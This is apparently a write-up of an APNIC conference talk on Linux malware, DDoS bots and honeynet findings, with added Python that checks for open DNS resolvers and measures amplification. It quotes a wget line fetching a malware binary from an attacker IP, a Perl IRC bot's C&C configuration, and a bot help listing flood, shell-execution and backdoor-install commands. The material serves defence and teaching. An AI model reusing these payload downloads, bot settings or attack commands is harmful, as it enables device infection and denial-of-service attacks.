APNIC's Senior Security Specialist Adli Wahid gave a presentation on Linux malware, DDoS agents and bots, based on observations from the Honeynet project at the IX 2020 – Internet Security and Mitigation of Risk Webinar, held online on 15 June 2020.
Plan & Objectives
1. Share a different perspective on DDoS
2. Talk about DDoS agents / Linux malware
3. Observations from our Community Honeynet Project
Different Perspective of DDoS
Diagram: the same attack seen from two sides. On one side the target / victim perspective (my network / infrastructure / host is what gets hit); on the other the attacker perspective (the source of the attack and how it is built).
Victim / Target Perspective
• Availability affected
  o System down
  o Critical or not (what is affected?)
• Priority
  o Business as usual
  o Services not disrupted
• Increase preparedness (or do nothing)
  – Detection
  – Incident Response
  – Mitigation
• Investigation
  – Actor
  – Motive
  – Attacker infrastructure
Source: https://www.shadowserver.org/news/mirai-botnet-14-1-million-german-customers-disrupted-liberia-taken-off-line-and-now-the-culprit-has-been-convicted/
Source of Attack Perspective
• How is the attack organized?
  o We tend to see only pieces of the puzzle (netflow, front-end)
• How do attackers build their attacking infrastructure?
  – What tools are used?
• Can we identify the attacker's infrastructure?
• Are we part of the attacker's infrastructure?
  – Can we detect or prevent this?
• Are we contributing to the DDoS problem?
Tools & Techniques
• Techniques
  – Misconfigured services used for amplification attacks
    o DNS, SSDP, NTP, Chargen, etc.
  – Recruiting servers & IoT devices as bots
    • Exploit known system vulnerabilities
    • Exploit weak/default credentials (e.g. SSH / telnet) + misconfiguration
• Use of malware
  – We hear more about Windows malware
  – Linux servers and IoT devices are targeted to infect the device
  – ELF binaries or scripts (Perl, bash, PHP, etc.)
  – The device then receives instructions to attack
Vulnerable services: Mongolia
• Data from the CyberGreen Project: https://stats.cybergreen.net/country/mongolia/
• Challenge: how to deal with misconfiguration of these services?
Chart: DDoS potential for Mongolia, broken down into open SNMP, open DNS and open NTP services.
Get reports about your network
• Shadowserver Foundation
  o https://www.shadowserver.org/what-we-do/network-reporting/get-reports/
• CyberGreen
  – Download data: https://stats.cybergreen.net/download/
• Do it yourself
  – Scan (Nmap)
  – Use a service such as Shodan.io
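Slides 7 to 9 list open DNS resolvers among the misconfigured services that give a network "DDoS potential" and suggest checking your own ranges. The Python below is an added example, not part of the talk nor of the CyberGreen or Shadowserver tooling. It builds a recursive DNS query, classifies a reply as coming from an open resolver when the RA (recursion available) flag is set on a NOERROR or NXDOMAIN answer, and computes the amplification ratio (response bytes per query byte) that makes such a resolver usable for reflection. The `fake_response` helper, the transaction id and the 192.0.2.1 address are constructed test data; `probe` sends the query to a resolver you administer.

```python
"""Open-resolver check and DNS amplification ratio (added example; constructed data)."""
import socket
import struct


def build_query(name: str, qtype: int = 1, txid: int = 0x1234) -> bytes:
    """Build a minimal DNS query for `name` with RD=1 (recursion desired)."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)  # flags 0x0100 = RD
    qname = b"".join(bytes([len(label)]) + label.encode()
                     for label in name.strip(".").split("."))
    return header + qname + b"\x00" + struct.pack("!HH", qtype, 1)  # class IN


def parse_header(data: bytes) -> dict:
    """Decode the 12-byte DNS header into the fields the check needs."""
    txid, flags, qd, an, ns, ar = struct.unpack("!HHHHHH", data[:12])
    return {
        "id": txid,
        "qr": bool(flags & 0x8000),   # 1 = this is a response
        "rd": bool(flags & 0x0100),   # recursion desired (echoed from the query)
        "ra": bool(flags & 0x0080),   # recursion available: server offers recursion
        "rcode": flags & 0x000F,      # 0 NOERROR, 3 NXDOMAIN, 5 REFUSED
        "answers": an,
    }


def classify(query: bytes, response: bytes) -> dict:
    """An 'open resolver' answers an outside recursive query with RA set and a
    real result (NOERROR or NXDOMAIN); REFUSED or RA=0 means recursion is restricted."""
    q, r = parse_header(query), parse_header(response)
    open_resolver = r["qr"] and r["id"] == q["id"] and r["ra"] and r["rcode"] in (0, 3)
    return {
        "open_resolver": bool(open_resolver),
        "rcode": r["rcode"],
        "answers": r["answers"],
        # bytes returned per byte sent: the reflection multiplier of this resolver
        "amplification": round(len(response) / len(query), 2),
    }


def fake_response(query: bytes, n_answers: int = 1, flags: int = 0x8180) -> bytes:
    """Constructed reply for offline testing: echoes the question section and
    appends `n_answers` A records pointing at 192.0.2.1 (documentation range).
    flags 0x8180 = QR|RD|RA with NOERROR; 0x8105 = QR|RD with REFUSED."""
    txid = struct.unpack("!H", query[:2])[0]
    header = struct.pack("!HHHHHH", txid, flags, 1, n_answers, 0, 0)
    # name pointer to offset 12, type A, class IN, TTL 300, rdlength 4, rdata
    rr = struct.pack("!HHHIH", 0xC00C, 1, 1, 300, 4) + bytes([192, 0, 2, 1])
    return header + query[12:] + rr * n_answers


def probe(host: str, name: str = "example.com", timeout: float = 2.0) -> dict:
    """Send the query over UDP/53 to a resolver you administer and classify the reply."""
    query = build_query(name)
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(query, (host, 53))
        data, _ = sock.recvfrom(4096)
    return classify(query, data)


if __name__ == "__main__":
    q = build_query("example.com")
    print("open resolver, 2 answers:", classify(q, fake_response(q, n_answers=2)))
    print("restricted resolver     :", classify(q, fake_response(q, 0, flags=0x8105)))
```

Run against a resolver on your own network (`probe("192.0.2.53")`, placeholder address): a reply with `open_resolver` True from an address outside your customer ranges is exactly the condition the CyberGreen "open DNS" count reports. The amplification figure grows with the size of the answer, which is why the bot help text later on the page takes a "reflection file" of names that return large responses.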
Linux/Unix Malware
• Routers, IoT devices and servers run Linux / Unix based OS
• Not new, but interesting
  – Targets are exposed on the Internet (HTTP, telnet on port 23)
  – Unpatched / unmonitored (i.e. no anti-virus)
  – Default/weak credentials
• Popular example: Mirai (DDoS agent)
  – Source code was shared publicly
  – Simple technique for infecting, spreading and persistence
Bot "recruitment" process
Diagram (attacker on the left, steps labelled 1 and 2) with the following stages:
• Brute force: username admin, password 12345
• Remote code execution via web interface
• Download binary / execute, e.g. wget http://37.x.2x.190:80/13747243572475/hx86_64
• Scan and gain access (spread to further devices)
• Connect to Command and Control (C&C)
Perl Bot (source excerpt)

    my $process = $rps[rand scalar @rps];          # fake process name to hide under
    my @rversion = ("Phl4nk");
    my $vers = $rversion[rand scalar @rversion];
    my @rircname = ("zombie");
    my $ircname = $rircname[rand scalar @rircname];
    chop (my $realname = $rircname[rand scalar @rircname]);
    my $nick = $rircname[rand scalar @rircname];   # IRC nick the bot uses
    my $server = '125.x.y.z';                      # IRC C&C server (masked on the slide)
    my $port = '1947';
    my $linas_max='8';
    my $sleep='5';
    my $homedir = "/tmp";
    my $version = 'v.02';
    my @admins = ("Nite","NiteMax","Nite123");     # nicks allowed to issue commands
    #my @hostauth = ("Nite");
    my @channels = ("#VPS");                       # channel joined to receive instructions
Bot help text (source code)

* Non-spoof / non-root attacks: (can run on all bots)
* STD <ip> <port> <time> = A non spoof UDP HIV STD flooder
* HOLD <host> <port> <time> = A vanilla TCP connection flooder
* JUNK <host> <port> <time> = A vanilla TCP flooder (modded)
* UNKNOWN <target> <port, 0 for random> <packet size, 0 for random> <secs> = Another non-spoof udp flooder
* HTTP <method> <target> <port> <path> <time> <power> = An extremely powerful HTTP flooder

* Spoof / root attacks:
* DNS <target IP> <port> <reflection file url> <forks> <pps limiter, -1 for no limit> <time> = DNS amplification flooder, use with caution
* BLACKNURSE <target ip> <secs> = An ICMP flooder that will crash most firewalls, causing them to drop packets.

* Bot commands:
* AK-47SCAN <ON/OFF> = Toggles scanner. Started automatically.
* GETIP <iface> = gets the IP address from an interface
* FASTFLUX <iface> <ip> <port> = starts a proxy to a port on another ip to an interface (same port)
* RNDNICK = Randomizes knight nickname
* NICK <nick> = Changes the nick of the client
* SERVER <server> = Changes servers
* GETSPOOFS = Gets the current spoofing
* SPOOFS <subnet> = Changes spoofing to a subnet
* DISABLE = Disables all packeting from the knight
* ENABLE = Enables all packeting from the knight
* KILL = Kills the knight
* GET <http address> <save as> = Downloads a file off the web
* VERSION = Requests version of knight
* KILLALL = Kills all current packeting
* HELP = Displays this
* IRC <command> = Sends this command to the server
* SH <command> = Executes a command
* BASH <command> = Run a bash command
* ISH <command> = Interactive SH (via privmsg)
* SHD <command> = Daemonize command
* INSTALL <http://server/bin> = Install binary (via wget)
* BINUPDATE <http://server/bin> = Update a binary (via wget)
* LOCKUP <http://server/bin> = Kill telnet, install a backdoor!
Preventing Infection
• Know your assets & customers
  – Get reports from Shadowserver, CyberGreen
  – Use tools (nmap) or services like Shodan.io
  – Awareness of vulnerabilities & active exploitation
• Secure / harden Linux & IoT devices
  o Access control to services (against brute force)
  o Remove / harden services: DNS resolver, NTP, etc.
  o Patch & upgrade
Threat intelligence sources referenced on the slide: https://otx.alienvault.net and www.virustotal.com
Detection
• Network based detection
  – Policy: downloading of ELF / binary with certain user agents
  – Brute force / telnet related activities
• Network Security Monitoring
  – Netflow
  – IDS/NSM: Zeek, Suricata
  – Honeypots
• Awareness of the threat landscape
  – Go deep into malware research & analysis
  – Collaborate & share information: C&C, infected hosts
• Forensics*
Example: detection with Suricata rulesets, Fbot, Community Honeynet Project (2019): https://securityaffairs.co/wordpress/96683/malware/linux-fbot-malware-analysis.html